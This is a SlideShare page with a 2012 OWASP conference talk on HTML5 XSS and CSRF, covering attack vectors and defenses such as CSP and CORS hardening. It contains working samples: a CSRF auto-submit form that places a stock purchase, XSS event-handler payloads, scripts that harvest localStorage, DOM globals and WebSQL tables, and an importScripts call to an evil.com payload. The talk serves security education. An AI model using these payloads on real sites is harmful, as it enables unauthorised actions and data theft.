SlideShare a Scribd company logo

XSS and CSRF with HTML5

Shreeraj Shah
Shreeraj Shah

This document discusses cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks in HTML5. It begins with an overview of the evolution of HTML and the expansion of the browser attack surface with new technologies. It then covers specific XSS vectors using new HTML5 features like media tags, autofocus attributes, and forms. The document also examines how CSRF can be conducted using HTML5 features like XMLHttpRequests and bypassing the same-origin policy and CORS restrictions. Defense techniques like content security policy headers are also discussed.

Related slideshows

JQuery introduction
JQuery introductionJQuery introduction
JQuery introduction
 
02. input validation module v5
02. input validation module v502. input validation module v5
02. input validation module v5
 
Java Server Faces (JSF) - Basics
Java Server Faces (JSF) - BasicsJava Server Faces (JSF) - Basics
Java Server Faces (JSF) - Basics
 
1 of 73
XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP OWASP AppSecUSA 2012 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com Who Am I? http://www.blueinfy.com Twitter --@shreeraj Twitter @shreeraj  Founder & Director  Blueinfy & iAppSecure Solutions Pvt. Ltd.  Past experience  Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev)  Interest  Web security research  Published research  Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.  Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.  Advisories - .Net, Java servers etc.  Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.  Books (Author)  Web 2.0 Security – Defending Ajax, RIA and SOA  Hacking Web Services  Web Hacking OWASP 2
HTML5 VECTORS – ATTACK SURFACE OWASP 3
HTML5 – Attacks on the rise … Evolution of HTML5  1991 – HTML started (plain and simple)  1996 – CSS & JavaScript (Welcome to world of XSS and browser security)  2000 – XHTML1 (Growing concerns and attacks on browsers)  2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion)  2009 – HTML5 (Here we go… new surface, architecture and defense) – HTML+CSS+JS OWASP 4
Modern Browser Model Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage FileSystem XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS/Content-Sec Sandbox Core Policies OWASP 5
HTML5 Architecture & Threat Model User Interface Cross Domain Application Sandbox (Origin – Policy ) HTML/CSS Single JavaScript Internet DOM/Page Application XHR Target DOM WebSockets Application Native Storage, WebSQL, IndexedDB Messaging APIs Geolocation and other FileSystem, Cache - APIs APIs OWASP 6
CSRF WITH HTML5 OWASP 7
CSRF Attack Vector ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At CSRF Attack – with session Login Success – cookie set Success Web Store Database Client/Victim Application Server Browser Server Successful exploitation … •SOP bypass •Cookie Replay OWASP 8
SOP bypass and Cookie Replay – Basic Type GET Request IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> POST Request <script type="text/javascript" language="JavaScript"> document.foo.submit(); </script> OWASP 9
Streams – name/value pairs are gone … JSON XML JS-Script JS-Object JS-Array OWASP 10
CSRF injection – splitting and forcing … <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"? ><methodCall><methodName>stocks.buy</methodName><params><param ><value><string>MSFT</string></value></param><param><value><double>2 6</double></value></param></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 11
CSRF with XHR and CORS bypass Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 12
XHR – Level 2 powering CSRF XHR object of HTML5 is very powerful Allows interesting features like cross origin request and binary upload/download xhr.responseType can be set to "text", "arraybuffer", "document“ and "blob“ Also, for posting data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc… OWASP 13
CORS & XHR – ingredients for CSRF Before HTML5 – Cross Domain was not possible through XHR (SOP applicable) HTML5 – allows cross origin calls with XHR-Level 2 calls CORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls) Adding extra HTTP header (Access-Control-Allow- Origin and few others) OWASP 14
CORS based HTTP Headers Request Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight) Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) OWASP 15
XHR – Stealth POST/GET CSRF – powered by CORS and XHR Hence, allow stealth channel and possible silent exploitation One way CSRF with any stream since XHR allows raw stream from browser (XML, JSON, Binary as well) Two way CSRF (POST and read both – in case of allow set to *) OWASP 16
Exploiting the use case CORS preflight bypass – certain Content-Type bypass preflight HTTP Forcing cookie replay by “withCredentials” Internal network scanning and tunneling Information harvesting (internal crawling) Stealth browser shell – post XSS (Allow origin- *) Business functionality abuse (upload and binary streams) OWASP 17
CSRF with XHR/HTML5 Authentication User Server establishing Session Login request (HTTPS) Session cookie Web Store Database Client/Victim Application Server Browser Server OWASP 18
CSRF with XHR/HTML5 Browser using XHR Call Authentication JavaScript User making Server a buy over HTTP Placing an order (JSON services) Success Web Store Database Client/Victim Application Server Browser Server OWASP 19
CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Session is Authentication ke c nd Server tta r se a d still live – not it A ke ylo Vis t ac pa yet logged At out Web Store Database Client/Victim Application Server Browser Server Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true OWASP 20
CSRF & HTML5 OWASP 21
CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP buy request Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP request generated • Silent Exploitation takes place OWASP 22
CSRF & HTML5 OWASP 23
CSRF with XHR/HTML5 Browser is having Form (multi-part) Business Authentication Server layer function of uploading Uploading bulk orders Success Web Store Database Client/Victim Application Server Browser Server OWASP 24
CSRF/Upload - POC OWASP 25
CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP multi-part - Upload Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP Upload takes place • Silent Exploitation… OWASP 26
CSRF/Upload OWASP 27
Internal Scan – not scan but crawl as well … Attacker’s Site Internet Internet CSRF Payload And stealth channel Client/Victim Intranet Intranet Browser Internal Web Internal HR Internal Web/App Mail Application Server OWASP 28
Internal Scan for CORS OWASP 29
Scan and Defend Scan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens or not Defense and Countermeasures Secure libraries for streaming HTML5/Web 2.0 content CSRF protections Stronger CORS implementation OWASP 30
XSS WITH HTML5 OWASP 31
XSS with HTML5 (tags, attributes and events) Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 32
HTML5 – Tags/Attributes/Events Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) Attributes – form, submit, autofocus, sandbox, manifest, rel etc. Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. OWASP 33
XSS variants Media tags Examples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)"><source> OWASP 34
XSS variants Exploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35
XSS variants Form & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form><button formaction="javascript:alert(1)">test Etc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/) OWASP 36
Scan and Defend Scan and look for Reflected or Persistent XSS spots with HTML5 tags Defense and Countermeasures Have it added on your blacklist Standard XSS protections by encoding OWASP 37
CSP in Action – HTML5 defense … Content Security Policy – Defending browser against possible post attack scenarios Based on Origin (SOP the key) Allows whitelisting mechanism for what “to do” and “not to do” It is possible to send back notification to application when violation takes place Implementation by extra HTTP headers [Brower to browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)] OWASP 38
Blocking Scripts Content-Security-Policy: script-src 'self‘ Only allowing script from the self Other mechanism 'unsafe-inline' - blocking inline 'unsafe-eval‘ – blocking eval type calls Post XSS defense can be crafted OWASP 39
Controlling Browser connect-src – Controlling WebSocket, XHR etc. frame-src – Source of the frame (ClickJacking) object-src – Flash, Silverlight etc. media-src – controlling audio and video img/style – image and style sources default-src https:; - locking over SSL only OWASP 40
Example  Persistent XSS injected HTTP/1.1 200 OK Date: Wed, 12 Sep 2012 14:40:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-WebKit-CSP: script-src 'self' X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 6146 OWASP 41
Storage extraction with XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 42
Web Storage Extraction Browser has one place to store data – Cookie (limited and replayed) HTML5 – Storage API provided (Local and Session) Can hold global scoped variables http://www.w3.org/TR/webstorage/ OWASP 43
Web Storage Extraction It is possible to steal them through XSS or via JavaScript Session hijacking – HttpOnly of no use getItem and setItem calls XSS the box and scan through storage OWASP 44
Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } Above code allows all storage variable extraction OWASP 45
File System Storage HTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem; It becomes a full blown local system for application in sandbox It empowers application OWASP 46
File System Storage It provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); }  App can have full filesystem in place now. OWASP 47
Sensitive information filesystem Assuming app is creating profile on local system OWASP 48
Extraction through XSS Once have an entry point – game over! OWASP 49
Single DOM/One Page App - XSS Applications run with “rich” DOM JavaScript sets several variables and parameters while loading – GLOBALS It has sensitive information and what if they are GLOBAL and remains during the life of application It can be retrieved with XSS HTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 50
Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } OWASP 51
Global Sensitive Information Extraction from DOM HTML5 apps running on Single DOM Having several key global variables, objects and array var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423mjfdvint","t est.com"]; Post DOM based exploitation possible and harvesting all these values. OWASP 52
Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } OWASP 53
Scan and Defend Scan and look for Scanning storage Defense and Countermeasures Do not store sensitive information on localStorage and Globals XSS protection OWASP 54
SQLi & Blind Enumeration through XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 55
SQL Injection WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. Allows one time data loading and offline browsing capabilities. Causes security concern and potential injection points. Methods and calls are possible OWASP 56
SQL Injection Through JavaScript one can harvest entire local database. Example OWASP 57
Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; OWASP 58
Blind WebSQL Enumeration We will run through all objects and get object where constructor is “Database” We will make Select query directly to sqlite_master database We will grab 1st table leaving webkit table on 0th entry OWASP 59
Blind WebSQL Enumeration OWASP 60
Web Messaging and Worker Injection Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 61
Web Messaging  HTML5 is having new interframe communication system called Web Messaging.  By postMessage() call parent frame/domain can call with the iframe  Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible  worker.webkitPostMessage – faster transferable objects OWASP 62
Web Messaging - Scenario If postMessage() is set to * so page can be loaded in iframe and messaging can be hijacked Also, origin is not set to fixed then again frame listen from any domian – again an issue Stream coming needs to be checked before innerHTML or eval() Iframe or Web Worker can glue two streams – same domain or cross domain OWASP 63
Origin check OWASP 64
Web Worker – Hacks! Web Workers allows threading into HTML pages using JavaScript No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlers Totally Async and well supported [initialize] var worker = new Worker('task.js'); [Messaging] worker.postMessage(); OWASP 65
Web Worker – Hacks! Web Page Current DOM Web Worker XHR, Location, Navigator etc. JavaScript Runtime Browser Platform Background Thread on same Scope and Object – No DOM Access page - messaging Regex, Array, JSON etc… OWASP 66
Web Worker – Hacks! Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) It has some typical issues  It allows the use of XHR. Hence, in-domain and CORS requests possible  It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though  Message validation needed – else DOM based XSS OWASP 67
Web Worker – Hacks!  Exmaple <html> <button onclick="Read()">Read Last Message</button> <button onclick="stop()">Stop</button> <output id="result"></output> <script> function Read() { worker.postMessage({'cmd': 'read', 'msg': 'last'}); } function stop() { worker.postMessage({'cmd': 'stop', 'msg': 'stop it'}); alert("Worker stopped"); } var worker = new Worker('message.js'); worker.addEventListener('message', function(e) { document.getElementById('result').innerHTML = e.data; }, false); </script> </html> OWASP 68
Web Workers – Hacks! Possible to cause XSS Running script Passing hidden payload Also, web workers can help in embedding silent running js file and can be controlled. Can be a tool for payload delivery and control within browser framework importScripts("http://evil.com/payload.js") – worker can run cross domain script OWASP 69
Scan and Defend Scan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(), document.* calls etc. Defense and Countermeasures Same origin listening is a must for messaging event Secure JavaScript coding OWASP 70
APIs … HTML5 few other APIs are interesting from security standpoint File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies …  Lot more to explore and defend… OWASP 71
Resources/References http://www.html5rocks.com/en/ (Solid stuff) https://www.owasp.org/index.php/HTML5_Security _Cheat_Sheet (OWASP stuff) http://html5sec.org/ (Quick Cheat sheet) http://html5security.org/ (Good resources) http://blog.kotowicz.net/ (Interesting work) OWASP 72
http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 73

More Related Content

XSS and CSRF with HTML5

  • 1. XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP OWASP AppSecUSA 2012 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com Who Am I? http://www.blueinfy.com Twitter --@shreeraj Twitter @shreeraj  Founder & Director  Blueinfy & iAppSecure Solutions Pvt. Ltd.  Past experience  Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev)  Interest  Web security research  Published research  Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.  Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.  Advisories - .Net, Java servers etc.  Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.  Books (Author)  Web 2.0 Security – Defending Ajax, RIA and SOA  Hacking Web Services  Web Hacking OWASP 2
  • 3. HTML5 VECTORS – ATTACK SURFACE OWASP 3
  • 4. HTML5 – Attacks on the rise … Evolution of HTML5  1991 – HTML started (plain and simple)  1996 – CSS & JavaScript (Welcome to world of XSS and browser security)  2000 – XHTML1 (Growing concerns and attacks on browsers)  2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion)  2009 – HTML5 (Here we go… new surface, architecture and defense) – HTML+CSS+JS OWASP 4
  • 5. Modern Browser Model Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage FileSystem XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS/Content-Sec Sandbox Core Policies OWASP 5
  • 6. HTML5 Architecture & Threat Model User Interface Cross Domain Application Sandbox (Origin – Policy ) HTML/CSS Single JavaScript Internet DOM/Page Application XHR Target DOM WebSockets Application Native Storage, WebSQL, IndexedDB Messaging APIs Geolocation and other FileSystem, Cache - APIs APIs OWASP 6
  • 7. CSRF WITH HTML5 OWASP 7
  • 8. CSRF Attack Vector ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At CSRF Attack – with session Login Success – cookie set Success Web Store Database Client/Victim Application Server Browser Server Successful exploitation … •SOP bypass •Cookie Replay OWASP 8
  • 9. SOP bypass and Cookie Replay – Basic Type GET Request IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> POST Request <script type="text/javascript" language="JavaScript"> document.foo.submit(); </script> OWASP 9
  • 10. Streams – name/value pairs are gone … JSON XML JS-Script JS-Object JS-Array OWASP 10
  • 11. CSRF injection – splitting and forcing … <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"? ><methodCall><methodName>stocks.buy</methodName><params><param ><value><string>MSFT</string></value></param><param><value><double>2 6</double></value></param></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 11
  • 12. CSRF with XHR and CORS bypass Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 12
  • 13. XHR – Level 2 powering CSRF XHR object of HTML5 is very powerful Allows interesting features like cross origin request and binary upload/download xhr.responseType can be set to "text", "arraybuffer", "document“ and "blob“ Also, for posting data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc… OWASP 13
  • 14. CORS & XHR – ingredients for CSRF Before HTML5 – Cross Domain was not possible through XHR (SOP applicable) HTML5 – allows cross origin calls with XHR-Level 2 calls CORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls) Adding extra HTTP header (Access-Control-Allow- Origin and few others) OWASP 14
  • 15. CORS based HTTP Headers Request Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight) Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) OWASP 15
  • 16. XHR – Stealth POST/GET CSRF – powered by CORS and XHR Hence, allow stealth channel and possible silent exploitation One way CSRF with any stream since XHR allows raw stream from browser (XML, JSON, Binary as well) Two way CSRF (POST and read both – in case of allow set to *) OWASP 16
  • 17. Exploiting the use case CORS preflight bypass – certain Content-Type bypass preflight HTTP Forcing cookie replay by “withCredentials” Internal network scanning and tunneling Information harvesting (internal crawling) Stealth browser shell – post XSS (Allow origin- *) Business functionality abuse (upload and binary streams) OWASP 17
  • 18. CSRF with XHR/HTML5 Authentication User Server establishing Session Login request (HTTPS) Session cookie Web Store Database Client/Victim Application Server Browser Server OWASP 18
  • 19. CSRF with XHR/HTML5 Browser using XHR Call Authentication JavaScript User making Server a buy over HTTP Placing an order (JSON services) Success Web Store Database Client/Victim Application Server Browser Server OWASP 19
  • 20. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Session is Authentication ke c nd Server tta r se a d still live – not it A ke ylo Vis t ac pa yet logged At out Web Store Database Client/Victim Application Server Browser Server Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true OWASP 20
  • 21. CSRF & HTML5 OWASP 21
  • 22. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP buy request Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP request generated • Silent Exploitation takes place OWASP 22
  • 23. CSRF & HTML5 OWASP 23
  • 24. CSRF with XHR/HTML5 Browser is having Form (multi-part) Business Authentication Server layer function of uploading Uploading bulk orders Success Web Store Database Client/Victim Application Server Browser Server OWASP 24
  • 25. CSRF/Upload - POC OWASP 25
  • 26. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP multi-part - Upload Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP Upload takes place • Silent Exploitation… OWASP 26
  • 27. CSRF/Upload OWASP 27
  • 28. Internal Scan – not scan but crawl as well … Attacker’s Site Internet Internet CSRF Payload And stealth channel Client/Victim Intranet Intranet Browser Internal Web Internal HR Internal Web/App Mail Application Server OWASP 28
  • 29. Internal Scan for CORS OWASP 29
  • 30. Scan and Defend Scan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens or not Defense and Countermeasures Secure libraries for streaming HTML5/Web 2.0 content CSRF protections Stronger CORS implementation OWASP 30
  • 31. XSS WITH HTML5 OWASP 31
  • 32. XSS with HTML5 (tags, attributes and events) Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 32
  • 33. HTML5 – Tags/Attributes/Events Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) Attributes – form, submit, autofocus, sandbox, manifest, rel etc. Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. OWASP 33
  • 34. XSS variants Media tags Examples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)"><source> OWASP 34
  • 35. XSS variants Exploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35
  • 36. XSS variants Form & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form><button formaction="javascript:alert(1)">test Etc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/) OWASP 36
  • 37. Scan and Defend Scan and look for Reflected or Persistent XSS spots with HTML5 tags Defense and Countermeasures Have it added on your blacklist Standard XSS protections by encoding OWASP 37
  • 38. CSP in Action – HTML5 defense … Content Security Policy – Defending browser against possible post attack scenarios Based on Origin (SOP the key) Allows whitelisting mechanism for what “to do” and “not to do” It is possible to send back notification to application when violation takes place Implementation by extra HTTP headers [Brower to browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)] OWASP 38
  • 39. Blocking Scripts Content-Security-Policy: script-src 'self‘ Only allowing script from the self Other mechanism 'unsafe-inline' - blocking inline 'unsafe-eval‘ – blocking eval type calls Post XSS defense can be crafted OWASP 39
  • 40. Controlling Browser connect-src – Controlling WebSocket, XHR etc. frame-src – Source of the frame (ClickJacking) object-src – Flash, Silverlight etc. media-src – controlling audio and video img/style – image and style sources default-src https:; - locking over SSL only OWASP 40
  • 41. Example  Persistent XSS injected HTTP/1.1 200 OK Date: Wed, 12 Sep 2012 14:40:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-WebKit-CSP: script-src 'self' X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 6146 OWASP 41
  • 42. Storage extraction with XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 42
  • 43. Web Storage Extraction Browser has one place to store data – Cookie (limited and replayed) HTML5 – Storage API provided (Local and Session) Can hold global scoped variables http://www.w3.org/TR/webstorage/ OWASP 43
  • 44. Web Storage Extraction It is possible to steal them through XSS or via JavaScript Session hijacking – HttpOnly of no use getItem and setItem calls XSS the box and scan through storage OWASP 44
  • 45. Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } Above code allows all storage variable extraction OWASP 45
  • 46. File System Storage HTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem; It becomes a full blown local system for application in sandbox It empowers application OWASP 46
  • 47. File System Storage It provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); }  App can have full filesystem in place now. OWASP 47
  • 48. Sensitive information filesystem Assuming app is creating profile on local system OWASP 48
  • 49. Extraction through XSS Once have an entry point – game over! OWASP 49
  • 50. Single DOM/One Page App - XSS Applications run with “rich” DOM JavaScript sets several variables and parameters while loading – GLOBALS It has sensitive information and what if they are GLOBAL and remains during the life of application It can be retrieved with XSS HTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 50
  • 51. Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } OWASP 51
  • 52. Global Sensitive Information Extraction from DOM HTML5 apps running on Single DOM Having several key global variables, objects and array var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423mjfdvint","t est.com"]; Post DOM based exploitation possible and harvesting all these values. OWASP 52
  • 53. Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } OWASP 53
  • 54. Scan and Defend Scan and look for Scanning storage Defense and Countermeasures Do not store sensitive information on localStorage and Globals XSS protection OWASP 54
  • 55. SQLi & Blind Enumeration through XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 55
  • 56. SQL Injection WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. Allows one time data loading and offline browsing capabilities. Causes security concern and potential injection points. Methods and calls are possible OWASP 56
  • 57. SQL Injection Through JavaScript one can harvest entire local database. Example OWASP 57
  • 58. Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; OWASP 58
  • 59. Blind WebSQL Enumeration We will run through all objects and get object where constructor is “Database” We will make Select query directly to sqlite_master database We will grab 1st table leaving webkit table on 0th entry OWASP 59
  • 61. Web Messaging and Worker Injection Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 61
  • 62. Web Messaging  HTML5 is having new interframe communication system called Web Messaging.  By postMessage() call parent frame/domain can call with the iframe  Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible  worker.webkitPostMessage – faster transferable objects OWASP 62
